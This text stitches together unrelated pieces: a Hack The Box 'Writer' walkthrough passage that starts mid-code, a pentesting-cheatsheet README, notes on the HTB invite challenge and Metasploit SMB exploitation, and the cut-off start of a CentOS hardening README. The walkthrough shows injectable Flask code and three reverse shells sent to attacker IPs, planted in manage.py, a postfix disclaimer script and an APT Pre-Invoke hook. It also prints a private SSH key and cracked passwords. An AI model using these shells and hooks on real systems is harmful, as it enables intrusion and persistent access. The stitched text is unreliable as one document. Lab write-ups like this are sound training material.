request.form.get('image_url'): image_url = request.form.get('image_url') if ".jpg" in image_url: try: local_filename, headers = urllib.request.urlretrieve(image_url) os.system("mv {} {}.jpg".format(local_filename, local_filename)) image = "{}.jpg".format(local_filename) try: im = Image.open(image) im.verify() im.close() image = image.replace('/tmp/','') os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image)) image = "/img/{}".format(image) except PIL.UnidentifiedImageError: os.system("rm {}".format(image)) error = "Not a valid image file!" return render_template('add.html', error=error) except: error = "Issue uploading picture" return render_template('add.html', error=error) else: error = "File extensions must be in .jpg!" return render_template('add.html', error=error) author = request.form.get('author') title = request.form.get('title') tagline = request.form.get('tagline') content = request.form.get('content') cursor = connector.cursor() cursor.execute("INSERT INTO stories VALUES (NULL,%(author)s,%(title)s,%(tagline)s,%(content)s,'Published',now(),%(image)s);", {'author':author,'title': title,'tagline': tagline,'content': content, 'image':image }) result = connector.commit() return redirect('/dashboard/stories') else: return render_template('add.html') @app.route('/dashboard/stories/edit/<id>', methods=['GET', 'POST']) def edit_story(id): if not ('user' in session): return redirect('/') try: connector = connections() except mysql.connector.Error as err: return ("Database error") if request.method == "POST": cursor = connector.cursor() cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id}) results = cursor.fetchall() if request.files['image']: image = request.files['image'] if ".jpg" in image.filename: path = os.path.join('/var/www/writer.htb/writer/static/img/', image.filename) image.save(path) image = "/img/{}".format(image.filename) cursor = connector.cursor() cursor.execute("UPDATE stories SET image = %(image)s WHERE id = %(id)s", {'image':image, 'id':id}) result = connector.commit() else: error = "File extensions must be in .jpg!" return render_template('edit.html', error=error, results=results, id=id) if request.form.get('image_url'): image_url = request.form.get('image_url') if ".jpg" in image_url: try: local_filename, headers = urllib.request.urlretrieve(image_url) os.system("mv {} {}.jpg".format(local_filename, local_filename)) image = "{}.jpg".format(local_filename) try: im = Image.open(image) im.verify() im.close() image = image.replace('/tmp/','') os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image)) image = "/img/{}".format(image) cursor = connector.cursor() cursor.execute("UPDATE stories SET image = %(image)s WHERE id = %(id)s", {'image':image, 'id':id}) result = connector.commit() except PIL.UnidentifiedImageError: os.system("rm {}".format(image)) error = "Not a valid image file!" return render_template('edit.html', error=error, results=results, id=id) except: error = "Issue uploading picture" return render_template('edit.html', error=error, results=results, id=id) else: error = "File extensions must be in .jpg!" return render_template('edit.html', error=error, results=results, id=id) title = request.form.get('title') tagline = request.form.get('tagline') content = request.form.get('content') cursor = connector.cursor() cursor.execute("UPDATE stories SET title = %(title)s, tagline = %(tagline)s, content = %(content)s WHERE id = %(id)s", {'title':title, 'tagline':tagline, 'content':content, 'id': id}) result = connector.commit() return redirect('/dashboard/stories') else: cursor = connector.cursor() cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id}) results = cursor.fetchall() return render_template('edit.html', results=results, id=id) @app.route('/dashboard/stories/delete/<id>', methods=['GET', 'POST']) def delete_story(id): if not ('user' in session): return redirect('/') try: connector = connections() except mysql.connector.Error as err: return ("Database error") if request.method == "POST": cursor = connector.cursor() cursor.execute("DELETE FROM stories WHERE id = %(id)s;", {'id': id}) result = connector.commit() return redirect('/dashboard/stories') else: cursor = connector.cursor() cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id}) results = cursor.fetchall() return render_template('delete.html', results=results, id=id) #Define user page for dashboard @app.route('/dashboard/users') def users(): if not ('user' in session): return redirect('/') try: connector = connections() except mysql.connector.Error as err: return "Database Error" cursor = connector.cursor() sql_command = "SELECT * FROM users;" cursor.execute(sql_command) results = cursor.fetchall() return render_template('users.html', results=results) #Define settings page @app.route('/dashboard/settings', methods=['GET']) def settings(): if not ('user' in session): return redirect('/') try: connector = connections() except mysql.connector.Error as err: return "Database Error!" cursor = connector.cursor() sql_command = "SELECT * FROM site WHERE id = 1" cursor.execute(sql_command) results = cursor.fetchall() return render_template('settings.html', results=results) #Define authentication mechanism @app.route('/administrative', methods=['POST', 'GET']) def login_page(): if ('user' in session): return redirect('/dashboard') if request.method == "POST": username = request.form.get('uname') password = request.form.get('password') password = hashlib.md5(password.encode('utf-8')).hexdigest() try: connector = connections() except mysql.connector.Error as err: return ("Database error") try: cursor = connector.cursor() sql_command = "Select * From users Where username = '%s' And password = '%s'" % (username, password) cursor.execute(sql_command) results = cursor.fetchall() for result in results: print("Got result") if result and len(result) != 0: session['user'] = username return render_template('success.html', results=results) else: error = "Incorrect credentials supplied" return render_template('login.html', error=error) except: error = "Incorrect credentials supplied" return render_template('login.html', error=error) else: return render_template('login.html') @app.route("/logout") def logout(): if not ('user' in session): return redirect('/') session.pop('user') return redirect('/') if __name__ == '__main__': app.run("0.0.0.0") ``` The intesting part from this file is the credentials: ```python connector = mysql.connector.connect(user='admin', password='ToughPasswordToCrack', host='127.0.0.1', database='writer') ``` We can use those creds on ```smbclient``` with ```kyle``` user (Users takes from ```/etc/passwd``` using ```sqlmap```): ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ smbclient \\\\writer.htb\\writer2_project -U kyle Enter WORKGROUP\kyle's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Mon Aug 2 09:52:48 2021 .. D 0 Tue Jun 22 20:55:06 2021 static D 0 Sun May 16 23:29:16 2021 staticfiles D 0 Fri Jul 9 13:59:42 2021 writer_web D 0 Wed May 19 18:26:18 2021 requirements.txt N 15 Fri Aug 13 00:22:01 2021 writerv2 D 0 Wed May 19 15:32:41 2021 manage.py N 806 Fri Aug 13 00:22:01 2021 7151096 blocks of size 1024. 1408292 blocks available ``` By replacing the file [manage.py](https://docs.djangoproject.com/en/3.2/ref/django-admin/) with python reverse shell we can get a reverse shell. First, Let's create file called ```manage.py``` with the following [python reverse shell](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python): ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.227",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ``` Next, Create ```nc``` listener on port 4242: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ nc -lvp 4242 listening on [any] 4242 ... ``` And last step - replace the file ```manage.py``` with our file: ```console smb: \> rm manage.py smb: \> mput manage.py Put file manage.py? yes putting file manage.py as \manage.py (0.9 kb/s) (average 0.9 kb/s) ``` And right after that we get reverse shell as ```www-data``` user: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ nc -lvp 4242 listening on [any] 4242 ... $ whoami www-data ``` ### User 2 By running [linpeas.sh](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) we found the following config files that contains DB credentials: ```console $ cat /etc/mysql/my.cnf ... [client-server] # Import all .cnf files from configuration directory !includedir /etc/mysql/conf.d/ !includedir /etc/mysql/mariadb.conf.d/ [client] database = dev user = djangouser password = DjangoSuperPassword default-character-set = utf8 ``` Let's try to connect dump data from this DB: ```console $ mysql -udjangouser -pDjangoSuperPassword -e "show databases;" Database dev information_schema $ mysql -udjangouser -pDjangoSuperPassword -e "use dev; show tables" Tables_in_dev auth_group auth_group_permissions auth_permission auth_user auth_user_groups auth_user_user_permissions django_admin_log django_content_type django_migrations django_session ``` And by dump ```auth_user``` table we get: ```console $ mysql -udjangouser -pDjangoSuperPassword -e "use dev; select * from auth_user" id password last_login is_superuser username first_name last_name email is_staff is_active date_joined 1 pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A= NULL 1 kyle [email protected] 1 1 2021-05-19 12:41:37.168368 ``` Which is possible the creds of ```kyle``` user. Let's try to crack it using ```hashcat```. First, let's found which mode we need: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ hashcat --example | grep -B2 -A2 pbkdf2_sha256 MODE: 10000 TYPE: Django (PBKDF2-SHA256) HASH: pbkdf2_sha256$10000$1135411628$bFYX62rfJobJ07VwrUMXfuffLfj2RDM2G6/BrTrUWkE= PASS: hashcat ``` Crack it: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ hashcat -m 10000 hash ~/Desktop/rockyou.txt ... Session..........: hashcat Status...........: Cracked Hash.Name........: Django (PBKDF2-SHA256) Hash.Target......: pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8...uXM4A= Time.Started.....: Fri Aug 13 03:25:24 2021 (1 min, 28 secs) Time.Estimated...: Fri Aug 13 03:26:52 2021 (0 secs) Guess.Base.......: File (/home/user/Desktop/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 116 H/s (17.34ms) @ Accel:256 Loops:512 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 10240/14344385 (0.07%) Rejected.........: 0/10240 (0.00%) Restore.Point....: 9216/14344385 (0.06%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:259584-259999 Candidates.#1....: robinhood -> 11221122 Started: Fri Aug 13 03:25:19 2021 Stopped: Fri Aug 13 03:26:53 2021 ``` Show the cracked password: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ hashcat -m 10000 --show hash pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A=:marcoantonio ``` And we successfully get ```kyle``` password ```marcoantonio```, Let's use it using ssh: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ ssh [email protected] [email protected]'s password: Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Fri 13 Aug 00:34:32 UTC 2021 System load: 0.0 Usage of /: 63.9% of 6.82GB Memory usage: 23% Swap usage: 0% Processes: 253 Users logged in: 0 IPv4 address for eth0: 10.10.11.101 IPv6 address for eth0: dead:beef::250:56ff:feb9:1e1e * Pure upstream Kubernetes 1.21, smallest, simplest cluster ops! https://microk8s.io/ 0 updates can be applied immediately. The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Wed Jul 28 09:03:32 2021 from 10.10.14.19 kyle@writer:~$ cat user.txt 704976e11715a0104b800172058d596d ``` And we get the user flag ```704976e11715a0104b800172058d596d```. ### User 2 By running ```groups```/```id``` we can see we are on the following group: ```console kyle@writer:~$ id uid=1000(kyle) gid=1000(kyle) groups=1000(kyle),997(filter),1002(smbgroup) kyle@writer:~$ groups kyle filter smbgroup ``` Let's find files owned by our group ```filter```: ```console kyle@writer:~$ find / -group filter -ls 2>&1 | grep -v "denied" 16282 4 -rwxrwxr-x 1 root filter 1021 Aug 15 16:46 /etc/postfix/disclaimer ``` Read about [disclaimer](https://baturorkun.medium.com/disclaimer-to-outgoing-emails-2ce576a6433b) which is simply adding text automatically to the end of all e-mails sent from the system. By running ```netstat -ant``` we see that port 25 is open on ```localhost```: ```console kyle@writer:~$ netstat -ant Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN tcp 0 0 10.10.11.101:22 10.10.16.227:44226 ESTABLISHED tcp 0 1 10.10.11.101:32994 1.1.1.1:53 SYN_SENT tcp6 0 0 :::80 :::* LISTEN tcp6 0 0 :::22 :::* LISTEN tcp6 0 0 :::445 :::* LISTEN tcp6 0 0 :::139 :::* LISTEN ``` By running ```nc 127.0.0.1 25``` we can see is ```ESMTP Postfix```: ```console kyle@writer:~$ nc localhost 25 220 writer.htb ESMTP Postfix (Ubuntu) ``` So we can send an email to the existing email address using port 25, To add a disclaimer (which is ```bash``` script behind) to that email, And we can get a reverse shell by changing the ```disclaimer``` script. First, Let's [add a disclaimer to outgoing emails With alterMIME](https://baturorkun.medium.com/disclaimer-to-outgoing-emails-2ce576a6433b). Next, Let's add reverse shell to ```disclaimer``` script: ```bash -c "bash -i >& /dev/tcp/10.10.14.14/4242 0>&1"```: ```console kyle@writer:~$ cat /etc/postfix/disclaimer #!/bin/sh #Our reverse shell bash -c "bash -i >& /dev/tcp/10.10.14.14/4242 0>&1" # Localize these. INSPECT_DIR=/var/spool/filter SENDMAIL=/usr/sbin/sendmail # Get disclaimer addresses DISCLAIMER_ADDRESSES=/etc/postfix/disclaimer_addresses # Exit codes from <sysexits.h> EX_TEMPFAIL=75 EX_UNAVAILABLE=69 # Clean up when done or when aborting. trap "rm -f in.$$" 0 1 2 3 15 # Start processing. cd $INSPECT_DIR || { echo $INSPECT_DIR does not exist; exit $EX_TEMPFAIL; } cat >in.$$ || { echo Cannot save mail to file; exit $EX_TEMPFAIL; } # obtain From address from_address=`grep -m 1 "From:" in.$$ | cut -d "<" -f 2 | cut -d ">" -f 1` if [ `grep -wi ^${from_address}$ ${DISCLAIMER_ADDRESSES}` ]; then /usr/bin/altermime --input=in.$$ \ --disclaimer=/etc/postfix/disclaimer.txt \ --disclaimer-html=/etc/postfix/disclaimer.txt \ --xheader="X-Copyrighted-Material: Please visit http://www.company.com/privacy.htm" || \ { echo Message content rejected; exit $EX_UNAVAILABLE; } fi $SENDMAIL "$@" <in.$$ exit $? ``` Let's look at the file ```/etc/postfix/disclaimer_addresse``` which holds all sender email addresses (one per line) for which ```alterMIME``` should add a disclaimer: ```console kyle@writer:~$ cat /etc/postfix/disclaimer_addresses [email protected] [email protected] ``` Meaning that we need to send mail from ```kyle```/```root``` to make the disclaimer script works. Let's use ```telnet``` to communicate with SMTP service to send the email using [SMTP commands](https://www.linuxjournal.com/content/sending-email-netcat): ```console kyle@writer:~$ telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 writer.htb ESMTP Postfix (Ubuntu) EHLO writer.htb 250-writer.htb 250-PIPELINING 250-SIZE 10240000 250-VRFY 250-ETRN 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250-SMTPUTF8 250 CHUNKING MAIL FROM: [email protected] 250 2.1.0 Ok RCPT TO: [email protected] 250 2.1.5 Ok DATA 354 End data with <CR><LF>.<CR><LF> From: [Alice Hacker] <[email protected]> To: [Bob Smith] <[email protected]> Subject: Test Message Hi there! This is supposed to be a real email... Have a good day! Alice . 250 2.0.0 Ok: queued as 048C76A3 ``` Listen to port 4242 and we get the reverse shell, Let's get ```john``` SSH private key: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ nc -lvp 8888 listening on [any] 8888 ... connect to [10.10.16.227] from writer.htb [10.10.11.101] 36722 bash: cannot set terminal process group (15011): Inappropriate ioctl for device bash: no job control in this shell john@writer:/var/spool/postfix$ whoami whoami john john@writer:/var/spool/postfix$ john@writer:/var/spool/postfix$ cat /home/john/.ssh/id_rsa cat /home/john/.ssh/id_rsa -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAxqOWLbG36VBpFEz2ENaw0DfwMRLJdD3QpaIApp27SvktsWY3hOJz wC4+LHoqnJpIdi/qLDnTx5v8vB67K04f+4FJl2fYVSwwMIrfc/+CHxcTrrw+uIRVIiUuKF OznaG7QbqiFE1CsmnNAf7mz4Ci5VfkjwfZr18rduaUXBdNVIzPwNnL48wzF1QHgVnRTCB3 i76pHSoZEA0bMDkUcqWuI0Z+3VOZlhGp0/v2jr2JH/uA6U0g4Ym8vqgwvEeTk1gNPIM6fg 9xEYMUw+GhXQ5Q3CPPAVUaAfRDSivWtzNF1XcELH1ofF+ZY44vcQppovWgyOaw2fAHW6ea TIcfhw3ExT2VSh7qm39NITKkAHwoPQ7VJbTY0Uj87+j6RV7xQJZqOG0ASxd4Y1PvKiGhke tFOd6a2m8cpJwsLFGQNtGA4kisG8m//aQsZfllYPI4n4A1pXi/7NA0E4cxNH+xt//ZMRws sfahK65k6+Yc91qFWl5R3Zw9wUZl/G10irJuYXUDAAAFiN5gLYDeYC2AAAAAB3NzaC1yc2 EAAAGBAMajli2xt+lQaRRM9hDWsNA38DESyXQ90KWiAKadu0r5LbFmN4Tic8AuPix6Kpya SHYv6iw508eb/LweuytOH/uBSZdn2FUsMDCK33P/gh8XE668PriEVSIlLihTs52hu0G6oh RNQrJpzQH+5s+AouVX5I8H2a9fK3bmlFwXTVSMz8DZy+PMMxdUB4FZ0Uwgd4u+qR0qGRAN GzA5FHKlriNGft1TmZYRqdP79o69iR/7gOlNIOGJvL6oMLxHk5NYDTyDOn4PcRGDFMPhoV 0OUNwjzwFVGgH0Q0or1rczRdV3BCx9aHxfmWOOL3EKaaL1oMjmsNnwB1unmkyHH4cNxMU9 lUoe6pt/TSEypAB8KD0O1SW02NFI/O/o+kVe8UCWajhtAEsXeGNT7yohoZHrRTnemtpvHK ScLCxRkDbRgOJIrBvJv/2kLGX5ZWDyOJ+ANaV4v+zQNBOHMTR/sbf/2TEcLLH2oSuuZOvm HPdahVpeUd2cPcFGZfxtdIqybmF1AwAAAAMBAAEAAAGAZMExObg9SvDoe82VunDLerIE+T 9IQ9fe70S/A8RZ7et6S9NHMfYTNFXAX5sP5iMzwg8HvqsOSt9KULldwtd7zXyEsXGQ/5LM VrL6KMJfZBm2eBkvzzQAYrNtODNMlhYk/3AFKjsOK6USwYJj3Lio55+vZQVcW2Hwj/zhH9 0J8msCLhXLH57CA4Ex1WCTkwOc35sz+IET+VpMgidRwd1b+LSXQPhYnRAUjlvtcfWdikVt 2+itVvkgbayuG7JKnqA4IQTrgoJuC/s4ZT4M8qh4SuN/ANHGohCuNsOcb5xp/E2WmZ3Gcm bB0XE4BEhilAWLts4yexGrQ9So+eAXnfWZHRObhugy88TGy4v05B3z955EWDFnrJX0aMXn l6N71m/g5XoYJ6hu5tazJtaHrZQsD5f71DCTLTSe1ZMwea6MnPisV8O7PC/PFIBP+5mdPf 3RXx0i7i5rLGdlTGJZUa+i/vGObbURyd5EECiS/Lpi0dnmUJKcgEKpf37xQgrFpTExAAAA wQDY6oeUVizwq7qNRqjtE8Cx2PvMDMYmCp4ub8UgG0JVsOVWenyikyYLaOqWr4gUxIXtCt A4BOWMkRaBBn+3YeqxRmOUo2iU4O3GQym3KnZsvqO8MoYeWtWuL+tnJNgDNQInzGZ4/SFK 23cynzsQBgb1V8u63gRX/IyYCWxZOHYpQb+yqPQUyGcdBjpkU3JQbb2Rrb5rXWzUCzjQJm Zs9F7wWV5O3OcDBcSQRCSrES3VxY+FUuODhPrrmAtgFKdkZGYAAADBAPSpB9WrW9cg0gta 9CFhgTt/IW75KE7eXIkVV/NH9lI4At6X4dQTSUXBFhqhzZcHq4aXzGEq4ALvUPP9yP7p7S 2BdgeQ7loiRBng6WrRlXazS++5NjI3rWL5cmHJ1H8VN6Z23+ee0O8x62IoYKdWqKWSCEGu dvMK1rPd3Mgj5x1lrM7nXTEuMbJEAoX8+AAxQ6KcEABWZ1xmZeA4MLeQTBMeoB+1HYYm+1 3NK8iNqGBR7bjv2XmVY6tDJaMJ+iJGdQAAAMEAz9h/44kuux7/DiyeWV/+MXy5vK2sJPmH Q87F9dTHwIzXQyx7xEZN7YHdBr7PHf7PYd4zNqW3GWL3reMjAtMYdir7hd1G6PjmtcJBA7 Vikbn3mEwRCjFa5XcRP9VX8nhwVoRGuf8QmD0beSm8WUb8wKBVkmNoPZNGNJb0xvSmFEJ/ BwT0yAhKXBsBk18mx8roPS+wd9MTZ7XAUX6F2mZ9T12aIYQCajbzpd+fJ/N64NhIxRh54f Nwy7uLkQ0cIY6XAAAAC2pvaG5Ad3JpdGVyAQIDBAUGBw== -----END OPENSSH PRIVATE KEY----- ``` ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ ssh -i id_rsa_john [email protected] Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Sun 15 Aug 21:03:55 UTC 2021 System load: 0.01 Usage of /: 64.0% of 6.82GB Memory usage: 24% Swap usage: 0% Processes: 260 Users logged in: 1 IPv4 address for eth0: 10.10.11.101 IPv6 address for eth0: dead:beef::250:56ff:feb9:6f9c * Pure upstream Kubernetes 1.21, smallest, simplest cluster ops! https://microk8s.io/ 0 updates can be applied immediately. The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Wed Jul 28 09:19:58 2021 from 10.10.14.19 john@writer:~$ ``` ### Root By running ```groups```/```id``` we can see we are on the following group: ```console john@writer:/etc/apt/apt.conf.d$ id uid=1001(john) gid=1001(john) groups=1001(john),1003(management) john@writer:/etc/apt/apt.conf.d$ groups john management ``` Let's find again files owned by our group ```management```: ```console john@writer:/home$ find / -group management -ls 2>&1 | grep -v "denied" 17525 4 drwxrwxr-x 2 root management 4096 Aug 15 21:20 /etc/apt/apt.conf.d ``` So we can see we have write permission to ```/etc/apt/apt.conf.d``` directory read about that directory on [https://kali.training/topic/advanced-apt-configuration-and-usage/](https://kali.training/topic/advanced-apt-configuration-and-usage/). We need first to create the following file on ```apt.conf.d``` directory: ```console john@writer:/etc/apt/apt.conf.d$ echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 1234 >/tmp/f"};' > pwn ``` Listen to port 1234 using ```nc``` and we get the reverse shell: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ nc -lvp 1234 listening on [any] 1234 ... connect to [10.10.14.14] from writer.htb [10.10.11.101] 34076 /bin/sh: 0: can't access tty; job control turned off # whoami root # cat /root/root.txt 62ff13e4cbca08766dcbedca5a1a726e ``` And we get the root flag ```62ff13e4cbca08766dcbedca5a1a726e```.
# Use the cheatsheets locally Run the `setup.sh` script to call each cheatsheet without a path. <br> ```bash git clone https://github.com/ChronosPK/pentesting-cheatsheets.git cd pentesting-cheatsheet sudo ./setup.sh ``` If you want to view the cheatsheets using a certain file editor like `subl`, <br> give the absolute path of the editor as a script argument. ```bash sudo ./setup.sh /usr/bin/subl ``` Enjoy the new commands! ```bash common-enum common-revshells # ... ``` <br> # More content on my cybersecurity website ## Paths to check: | Category | Link | |-----------------------------------------|-------------------------------------------------------------------| | Pentest Cheatsheets | [https://chronossec.site/s/cheatsheets/pentest-enumertation](https://chronossec.site/s/cheatsheets/pentest-enumertation) | | Learning resources | [https://chronossec.site/s/cheatsheets/learning-resources](https://chronossec.site/s/cheatsheets/learning-resources) | | Boxes and templates to prep for certs. | [https://chronossec.site/s/writeups/cert-prep/](https://chronossec.site/s/writeups/cert-prep/) | | Tricks and tools | [https://chronossec.site/s/cheatsheets/trick-and-tools](https://chronossec.site/s/cheatsheets/trick-and-tools) | | CTFs writeups | [https://chronossec.site/s/writeups/ctfs/](https://chronossec.site/s/writeups/ctfs/) | | TryHackMe Writeups | [https://chronossec.site/s/writeups/tryhackme](https://chronossec.site/s/writeups/tryhackme) | | HackTheBox Writeups | [https://chronossec.site/s/writeups/hackthebox](https://chronossec.site/s/writeups/hackthebox) | | Forensics and steganography | [https://chronossec.site/s/cheatsheets/forensics-and-steg](https://chronossec.site/s/cheatsheets/forensics-and-steg) | <br> Keep in mind that I keep updating and working on my projects everyday, so nothing reached it's final form. <br> # Enjoy!
# Hack The Box ## Entry The task is to find the an interesting script. It goes as `view-source:https://www.hackthebox.eu/js/inviteapi.min.js`. ```js eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0 3(){$.4({5:"6",7:"8",9:\'/b/c/d/e/f\',g:0(a){1.2(a)},h:0(a){1.2(a)}})}',18,18,'function|console|log|makeInviteCode|ajax|type|POST|dataType|json|url||api|invite|how|to|generate|success|error'.split('|'),0,{})) ``` This looks like packed code. Unpack the code to get: ```js function makeInviteCode() { $.ajax({ type: "POST", dataType: "json", url: '/api/invite/how/to/generate', success: function (a) { console.log(a) }, error: function (a) { console.log(a) } }) } ``` Go on to the console and run the function `makeInviteCode()`. The following is received: ```s SW4gb3JkZXIgdG8gZ2VuZXJhdGUgdGhlIGludml0ZSBjb2RlLCBtYWtlIGEgUE9TVCByZXF1ZXN0IHRvIC9hcGkvaW52aXRlL2dlbmVyYXRl Encoding: Base 64 ``` Simply put a `echo ... | base64 -d` to get `In order to generate the invite code, make a POST request to /api/invite/generate`. Now `curl -X POST 'https://www.hackthebox.eu/api/invite/generate'` to get another base64 encoded `Sk5ZSVAtQlNMQU0tSkJCUlAtQ0dQTkstRU5IQlY=`. Perform another `base64 -d` to get the invite code. (Unpacker)[https://www.strictly-software.com/unpacker/] # Cheatsheet ## Exploit database 1. Exploit-db 2. Rapid 7 ## Scanning First step is to enumerate the machine. Some tried and tested combinations. 1. Do not go for `T1`. It's too fast, and ```s nmap -A -T4 -p- <ip-address> ``` Host scripts results from `nmap`: 1. `Message signing disabled` (or `enabled but not required`) is a dangerous thing allowing an attacker to access a reverse shell. ## Port 1. 139: SMB (`man smbclient`) ## Metasploit Opening: `msfconsole` Access: `/usr/share/metasploit-framework/modules` HTTP scanners: [link](https://www.offensive-security.com/metasploit-unleashed/scanner-http-auxiliary-modules/) ### Staged and unstaged payloads Whether the exploit delivers the payload at once or in stages. Forward slashes in the payload implies staged payload. ### SMB enumeration 1. `search smb_version` gives an auxiliary smb scanner (`auxiliary/scanner/smb/smb_version`). 2. To use that, `use auxiliary/scanner/smb/smb_version` 3. `set rhosts` to set the remote hosts. 4. `exploit` to carry out the exploit/scanner. 5. Search for other exploits on some database, like `exploit/windows/smb/ms08_067_netapi` and use it like `use exploit/windows/smb/ms08_067_netapi` from within the auxiliary scanner already set up. 6. [MS17-010](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010): a very critical SMB vulnerability. And [EternalBlue](https://research.checkpoint.com/2017/eternalblue-everything-know/) exploit. #### Searching for Eternal Blue This might be crash the machine, so heads up. 1. `msfconsole` 2. `search ms17-010` 3. `use auxiliary/scanner/smb/smb_ms17_010` # Meterpreter Reverse shell ### Postexploitation enumeration 1. getuid 2. sysinfo 3. hashdump: Dump the SAM table and thus the user passwords. 4. shell # TMUX Default prefix: `Ctrl + B`. Press at the same time (or in quick succession), release, and then press one of the key bindings. 1. % : pane split left and right 2. " : split it into top and bottom 3. arrow-keys: switching panes 4. c : create a new window 5. d : detach the current session 6. , : renaming the current window
Table of Contents ================= - [Purpose](#purpose) - [Environment](#environment) - [Warning](#warning) - [Quick Install](#quick-install) * [Configuration](#configuration) * [Installation](#installation) - [Run Security Check](#run-security-check) * [Basic os check](#basic-os-check) - [Installed Packages](#installed-packages) - [Quick Note - Package](#quick-note---package) * [Nginx module - os_preparation](#nginx-module---os_preparation) * [Firewalld usage](#firewalld-usage) * [Fail2ban usage](#fail2ban-usage) - [Quick Note - Fail2ban flow](#quick-note---fail2ban-flow) - [Quick Note - Fail2ban all detailed status](#quick-note---fail2ban-all-detailed-status) - [Install SSL (Letsencrypt) - A+](#install-ssl-letsencrypt---a) * [Setup Nginx](#setup-nginx) * [Certbot prerequisite](#certbot-prerequisite) * [Certbot usage](#certbot-usage) - [Log analyzer](#log-analyzer) * [GoAccess usage](#goaccess-usage) * [Logwatch usage](#logwatch-usage) - [Performance monitor](#performance-monitor) * [Iotop usage](#iotop-usage) * [Glances usage](#glances-usage) - [CHANGELOG](#changelog) # Try Ubuntu now **Try Ubuntu World ===> https://github.com/charlietag/ubuntu_security** # Purpose **This presumes that you've done with** [os_preparation](https://github.com/charlietag/os_preparation) 1. This is used for check if your linux server is being hacked. 1. This could also help you to enhance your servers' security with **firewalld** and **fail2ban**. 1. This is also designed for **PRODUCTION** single server, which means this is suit for small business. # Supported Environment * CentOS Stream release 9 * os_preparation * release : `master` `v3.x.x` * CentOS Stream release 8 * os_preparation * release : `v2.x.x` * CentOS 8 (8.x) * os_preparation * release : `v1.x.x` * CentOS 7 (7.x) **(deprecated)** * os_preparation * release : `v0.x.x` # Warning * If you found something is weired and not sure if you've been hacked. You'd better reinstall your server. * ClamAV (clamscan) - if you're going to scan virus through clamscan (ClamAV), which is installed by default ([os_security](https://github.com/charlietag/os_security)) * `clamscan` is a **memory monster** * RAM (Physical + SWAP) Capacity recommendations for clamscan (ClamAV): **>= 4GB** * (Tip) mkswap if RAM is insufficient to run clamscan * [os_preparation#SWAP_FILE](https://github.com/charlietag/os_preparation#warning) * If your ***physical memory is <= 1GB***, be sure stop some service before getting started * (**Nginx) is needed** when **TLS (certbot) certificates is required** ```bash echo "mariadb php-fpm puma" | sed 's/ /\n/g' | xargs -I{} bash -c "echo --- Stop / Disable {} ---; systemctl stop {} ; systemctl disable {}; echo" ``` * **Nginx is not needed**, when **NO TLS certificates** required ```bash echo "mariadb php-fpm puma nginx" | sed 's/ /\n/g' | xargs -I{} bash -c "echo --- Stop / 